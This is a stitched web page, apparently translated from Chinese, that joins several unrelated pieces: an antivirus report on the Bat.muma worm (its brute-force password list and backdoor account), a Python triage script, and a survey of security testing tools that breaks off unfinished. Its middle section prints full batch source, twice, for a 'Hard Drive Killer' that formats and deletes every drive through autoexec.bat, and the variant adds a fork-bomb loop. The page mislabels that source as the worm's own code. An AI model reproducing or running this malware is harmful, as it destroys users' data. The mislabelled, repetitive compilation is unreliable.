Port scanning interface_find port scanning tool

hacker

What is this "replace" file on my D: drive?

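It looks like a virus; run antivirus software to remove it.

Below is some reference material on what the virus may be:

Technical analysis report on the fast-spreading worm "Muma" (Bat.muma)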

-----------------------------------------------------------------------------

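(2003-06-05 19:50) Source: Kingsoft Antivirus Security News Network

Virus name: Bat.muma

Virus type: worm

Threat level: medium

Propagation speed: high

Technical characteristics:

The virus is written as batch commands and carries a port-scanning tool. It spreads aggressively by brute-forcing the superuser password of the computers it attacks.

Virus behavior:

1. The virus may copy the following files to the system directory: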

10.bat

hack.bat

hfind.exe

ipc.bat

muma.bat

near.bat

ntservice.bat

ntservice.exe

NTService.ini

nwiz.exe

nwiz.in_

nwiz.ini

ipcpass.txt

tihuan.txt

rep.exe

psexec.exe

random.bat

replace.bat

ss.bat

start.bat

pcmsg.dll

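2. The virus starts from Start.bat. This batch file calls the other batch files to carry out the infection;

3. The virus searches the \MU directory and its subdirectories on drives C: through H: for all files and saves the file names in LAN.LOG. When a file name found contains the string "MU", nwiz.exe is executed; nwiz.exe applies a simple encryption to the strings in the virus according to nwiz.ini and nwiz.in_. After the search completes, LAN.LOG is deleted;

4. Deletes ipcfind.txt and calls HFind.exe to run a network scan, searching for computers on the network. It then tries the following passwords against the computers it attacks. The possible passwords are: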

password

passwd

admin

pass

123

1234

12345

123456

(empty password)

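5. For computers successfully cracked by HFind.exe, the virus copies all of the files listed above into the system directory through the administrative file share. On Windows NT and Windows 2000 this is C:\winnt\system32; on Windows XP it is C:\winnt\system32 or C:\Windows\system32; on Win9X it is C:\windows\system;

6. After a successful infection, the virus uses Psexec.exe to remotely start Start.bat on the infected computer, which activates the virus there;

7. Calls the system program netstat.exe, then runs Near.bat to obtain more IP addresses from the netstat output, and attacks those IPs;

8. ss.bat creates or modifies the admin user on the system and sets its password to KKKKKKK, leaving a backdoor on the attacked computer.

9. Uses ntservice.bat to call ntservice.exe and register itself as a system service named "Application", ensuring that it is activated every time the system restarts.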
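
The file names and system directories from the report above can be turned into a host triage check. This is an added example, not code from the original report; the `AMBIGUOUS` set, the `MIN_DISTINCTIVE` threshold and the sample listings are assumptions made for illustration.

```python
"""Triage a recursive file listing for Bat.muma artifacts (added example)."""
import ntpath

# File names the report says the worm may copy into the system directory.
MUMA_FILES = {
    "10.bat", "hack.bat", "hfind.exe", "ipc.bat", "muma.bat", "near.bat",
    "ntservice.bat", "ntservice.exe", "ntservice.ini", "nwiz.exe", "nwiz.in_",
    "nwiz.ini", "ipcpass.txt", "tihuan.txt", "rep.exe", "psexec.exe",
    "random.bat", "replace.bat", "ss.bat", "start.bat", "pcmsg.dll",
}
# System directories named in the report (NT/2000, XP, Win9X).
SYSTEM_DIRS = {r"c:\winnt\system32", r"c:\windows\system32", r"c:\windows\system"}
# Assumption: names that also turn up on clean hosts (PsExec is a legitimate
# admin tool, the others are generic), so on their own they only merit review.
AMBIGUOUS = {"psexec.exe", "start.bat", "replace.bat", "random.bat", "rep.exe"}
MIN_DISTINCTIVE = 3  # assumed threshold, not taken from the report


def triage(paths):
    """Return (verdict, hits) where hits maps system dir -> matched names."""
    hits = {}
    for raw in paths:
        # Windows paths are case-insensitive and may use either slash.
        path = ntpath.normpath(raw.strip().strip('"')).lower()
        folder, name = ntpath.split(path)
        if folder in SYSTEM_DIRS and name in MUMA_FILES:
            hits.setdefault(folder, set()).add(name)
    verdict = "clean"
    for names in hits.values():
        if len(names - AMBIGUOUS) >= MIN_DISTINCTIVE:
            return "likely-infected", hits
        verdict = "review"
    return verdict, hits


# Constructed sample listings (not taken from a real host).
INFECTED = [r"C:\WINNT\system32\HFind.exe", r"C:\WINNT\system32\Start.bat",
            r"C:\WINNT\system32\ipcpass.txt", r"C:\WINNT\system32\nwiz.in_",
            r"C:\WINNT\system32\cmd.exe"]
ADMIN_BOX = [r"C:\Windows\System32\PsExec.exe", r"D:\tools\hfind.exe"]

if __name__ == "__main__":
    for label, listing in (("infected", INFECTED), ("admin box", ADMIN_BOX)):
        print(label, triage(listing))
```

A "review" verdict means only ambiguous or too few names matched; the service named "Application" and the admin account described in steps 8 and 9 are the next things to check on such a host.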

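What does Bat.Worm.Muma do?

That is a virus. It is written as batch commands and carries a port-scanning tool, and it spreads aggressively by brute-forcing the superuser password of the computers it attacks. The virus starts from Start.bat. This batch file calls the other batch files to carry out the infection;

3. The virus searches the \MU directory and its subdirectories on drives C: through H: for all files and saves the file names in LAN.LOG. When a file name found contains the string "MU", nwiz.exe is executed; nwiz.exe applies a simple encryption to the strings in the virus according to nwiz.ini and nwiz.in_. After the search completes, LAN.LOG is deleted;

4. Deletes ipcfind.txt and calls HFind.exe to run a network scan, searching for computers on the network. It then tries the following passwords against the computers it attacks. The possible passwords are: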

password

passwd

admin

pass

123

1234

12345

123456

(empty password)

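5. For computers successfully cracked by HFind.exe, the virus copies all of the files listed above into the system directory through the administrative file share. On Windows NT and Windows 2000 this is C:\winnt\system32; on Windows XP it is C:\winnt\system32 or C:\Windows\system32; on Win9X it is C:\windows\system;

6. After a successful infection, the virus uses Psexec.exe to remotely start Start.bat on the infected computer, which activates the virus there;

7. Calls the system program netstat.exe, then runs Near.bat to obtain more IP addresses from the netstat output, and attacks those IPs;

8. ss.bat creates or modifies the admin user on the system and sets its password to KKKKKKK, leaving a backdoor on the attacked computer.

9. Uses ntservice.bat to call ntservice.exe and register itself as a system service named "Application", ensuring that it is activated every time the system restarts.

A mutated variant has appeared recently.

Original virus source code:

@echo off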

rem This program is dedecated to a very special person that does not want to be named.

:start

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

call attrib -r -h c:autoexec.bat nul

echo @echo off c:autoexec.bat

echo call format c: /q /u /autoSample nul c:autoexec.bat

call attrib +r +h c:autoexec.bat nul

rem Drive checking and assigning the valid drives to the drive variable.

set drive=

set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.

rem drivechk.bat is the file name under the root directory.

rem As far as the drive detection and drive variable settings, don't worry about how it

rem works, it's d*amn to complicated for the average or even the expert batch programmer.

rem Except for Tom Lavedas.

echo @echo off drivechk.bat

echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" nul {t}.bat

%comspec% /e:2048 /c {t}.bat drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem When errorlevel is 1, then the above is not true, if 0, then it's true.

rem Opposite of binary rules. If 0, it will elaps to the next command.

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" nul {t}.bat

%comspec% /e:2048 /c {t}.bat drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.

rem if errorlevel is 0, then it will elaps to the next command.

echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" nul {t}.bat

%comspec% /e:2048 /c {t}.bat drivechk.bat

del {t}.bat

echo if errorlevel 1 set drive=%%drive%% %%1 drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.

rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.

echo :enddc drivechk.bat

rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".

rem Now we will use the program drivechk.bat to attain valid drive information.

:Sampledrv

for %%a in (%alldrive%) do call drivechk.bat %%a nul

del drivechk.bat nul

if %drive.==. set drive=c

:form_del

call attrib -r -h c:autoexec.bat nul

echo @echo off c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a: nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a: nul c:autoexec.bat

echo cd c:autoexec.bat

echo cls c:autoexec.bat

echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. c:autoexec.bat

echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . c:autoexec.bat

echo echo 1. To make people aware that security should not be taken for granted. c:autoexec.bat

echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! c:autoexec.bat

echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. c:autoexec.bat

echo echo 4. Don't support the following: War, Raci *** , Drugs and the Liberal Party.c:autoexec.bat

echo echo. c:autoexec.bat

echo echo Regards, c:autoexec.bat

echo echo. c:autoexec.bat

echo echo Munga Bunga c:autoexec.bat

call attrib +r +h c:autoexec.bat

:makedir

if exist c:temp.bat attrib -r -h c:temp.bat nul

echo @echo off c:temp.bat

echo %%1: c:temp.bat

echo cd c:temp.bat

echo :startmd c:temp.bat

echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a c:temp.bat

echo for %%%%a in ("ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! c:temp.bat

echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto startmd c:temp.bat

call attrib +r +h c:temp.bat nul

cls

echo Initializing Variables . . .

rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for further destruction.

for %%a in (%drive%) do call format %%a: /q /u /autoSample nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

for %%a in (%drive%) do call c:temp.bat %%a Munga nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

for %%a in (%drive%) call attrib -r -h %%a: /S nul

call attrib +r +h c:temp.bat nul

call attrib +r +h c:autoexec.bat nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

echo Initializing Application . . .

for %%a in (%drive%) call deltree /y %%a:*. nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

echo Initializing Application . . .

echo Starting Application . . .

for %%a in (%drive%) do call c:temp.bat %%a Munga nul

cls

echo Thank you for using a Munga Bunga product.

echo.

echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.

echo.

echo Here is a joke for you . . .

echo.

echo Q). What's the worst thing about being an egg?

echo A). You only get laid once.

echo.

echo HAHAHAHA, get it? Don't you just love that one?

echo.

echo Regards,

echo.

echo Munga Bunga

Variant virus source code:

@echo off

rem This program is dedecated to a very special person that does not want to be named.

:start

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

call attrib -r -h c:autoexec.bat nul

echo @echo off c:autoexec.bat

echo call format c: /q /u /autoSample nul c:autoexec.bat

call attrib +r +h c:autoexec.bat nul

rem Drive checking and assigning the valid drives to the drive variable.

set drive=

set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.

rem drivechk.bat is the file name under the root directory.

rem As far as the drive detection and drive variable settings, don't worry about how it

rem works, it's d*amn to complicated for the average or even the expert batch programmer.

rem Except for Tom Lavedas.

echo @echo off drivechk.bat

echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" nul {t}.bat

%comspec% /e:2048 /c {t}.bat drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem When errorlevel is 1, then the above is not true, if 0, then it's true.

rem Opposite of binary rules. If 0, it will elaps to the next command.

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" nul {t}.bat

%comspec% /e:2048 /c {t}.bat drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.

rem if errorlevel is 0, then it will elaps to the next command.

echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" nul {t}.bat

%comspec% /e:2048 /c {t}.bat drivechk.bat

del {t}.bat

echo if errorlevel 1 set drive=%%drive%% %%1 drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.

rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.

echo :enddc drivechk.bat

rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".

rem Now we will use the program drivechk.bat to attain valid drive information.

:Sampledrv

for %%a in (%alldrive%) do call drivechk.bat %%a nul

del drivechk.bat nul

if %drive.==. set drive=c

:form_del

call attrib -r -h c:autoexec.bat nul

echo @echo off c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a: nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a: nul c:autoexec.bat

echo cd c:autoexec.bat

echo cls c:autoexec.bat

echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. c:autoexec.bat

echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . c:autoexec.bat

echo echo 1. To make people aware that security should not be taken for granted. c:autoexec.bat

echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! c:autoexec.bat

echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. c:autoexec.bat

echo echo 4. Don't support the following: War, Raci *** , Drugs and the Liberal Party.c:autoexec.bat

echo echo. c:autoexec.bat

echo echo Regards, c:autoexec.bat

echo echo. c:autoexec.bat

echo echo Munga Bunga c:autoexec.bat

call attrib +r +h c:autoexec.bat

:makedir

if exist c:temp.bat attrib -r -h c:temp.bat nul

echo @echo off c:temp.bat

echo %%1: c:temp.bat

echo cd c:temp.bat

echo :startmd c:temp.bat

echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a c:temp.bat

echo for %%%%a in ("ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! c:temp.bat

echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto startmd c:temp.bat

call attrib +r +h c:temp.bat nul

cls

echo Initializing Variables . . .

rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for further destruction.

for %%a in (%drive%) do call format %%a: /q /u /autoSample nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

for %%a in (%drive%) do call c:temp.bat %%a Munga nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

for %%a in (%drive%) call attrib -r -h %%a: /S nul

call attrib +r +h c:temp.bat nul

call attrib +r +h c:autoexec.bat nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

echo Initializing Application . . .

for %%a in (%drive%) call deltree /y %%a:*. nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

echo Initializing Application . . .

echo Starting Application . . .

for %%a in (%drive%) do call c:temp.bat %%a Munga nul

cls

echo Thank you for using a Munga Bunga product.

echo.

echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.

echo.

echo Here is a joke for you . . .

echo.

echo Q). What's the worst thing about being an egg?

echo A). You only get laid once.

echo.

echo HAHAHAHA, get it? Don't you just love that one?

echo.

echo Regards,

echo.

echo Munga Bunga

echo You got it!!

:a

start cmd.exe

start %0

goto a

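Which software security testing tools are the most popular?

Earlier, while running the survey on the state of software testing in China, the results for security testing tools were widely spread because there are so many of them, and the share answering "Other" was very high (66%). A dedicated survey was therefore run; although not many valid responses were collected (fewer than 100), it basically reflects how testing tools are currently used.

1. Overall, (static) code analysis tools and (dynamic) penetration testing tools are both fairly widely used, at over 60%, with penetration testing tools (73.68%) slightly ahead, about 10% higher. Fuzzing tools, which people may find unfamiliar, are as low as 16%, but they can still play a role in security and reliability testing. In theory, code analysis tools should be able to reach over 95%, because they are easy to use and security is already a red line at many companies and gets enough attention. Hopefully companies will step up their use of code analysis tools and fuzzing tools in the future.

2. The top three Java code security analysis tools are: IBM AppScan Source Edition (42.11%), Fortify Static Code Analyzer (36.84%) and Findbugs (26.32%). JTest, PMD and others did not make the top three, although the gap to third place is small, only about 5%. Some companies also use Checkmarx, which was not in this survey. Coverity also supports Java; perhaps because Java has many open-source tools, people rarely use it.

3. The top three C/C++ code security analysis tools are: C++Test (38.89%), IBM AppScan Source Edition (38.89%), Fortify Static Code Analyzer (27.78%) and Visual Studio (27.78%). Coverity, CppCheck and LDRA Testbed did not make the top three; perhaps LDRA Testbed is relatively expensive and is used more for critical embedded software, while Coverity Cloud offers a free service for code on GitHub and similar sites, which everyone can try.

4. The most widely used JavaScript code security analysis tool is Google's Closure Compiler, followed by *** Hint; some companies also use Coverity for *** code analysis.

5. The most widely used Python code security analysis tool is Pychecker, followed by PyCharm, while Pylint is used relatively little; a few companies also use Coverity for Python code analysis.

6. Among commercial tools for web application security testing, IBM AppScan stands out with as much as 70% of the market, and no other commercial tool can compete with it. Second-place SoapUI trails it by more than 50%, and HP WebInspect is under 10%.

7. Among open-source tools for web application security testing, Firebug is clearly in the lead at nearly 50%, 12% higher than second-place OWASP ZAP; third is Firefox Web Developer Tools, at over 20%.

8. Among Android app security testing tools, Android Tamer leads at nearly 30%, about 15% higher than the second- and third-place AndroBugs, Mobisec and Santoku. Other tools not listed in the survey are also used; overall, usage of Android app security testing tools is fairly scattered.

9. Among network status monitoring and analysis tools, Wireshark is far ahead at over 70%, followed by Tcpdump and Burp Suite at around 30%. There are quite a few network status monitoring and analysis tools, but this survey shows usage concentrating more and more on a handful of them, especially Wireshark, which is powerful, covers many protocols and is very popular.

10. The top three SQL injection testing tools are SQLInjector, SQL Power Injector and OWASP SQLiX; the three are close, with gaps of around 6%. The other two tools, Pangolin and SQLSqueal, also account for 10%, while Antonio Parata, Blind SQL Injections, Bsqlbf-v2, Multiple DBMS Sql Injection and Sqlninja are used by almost no one.

There are many security testing tools, including some commonly used by hackers, such as password brute-forcing tools, port scanning tools, firewall penetration tools and penetration testing platforms. In a sense these go beyond the scope of software and belong more to fields such as cyberspace security and cryptography, so they are not covered here. In summary, the most popular software security testing tools are: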
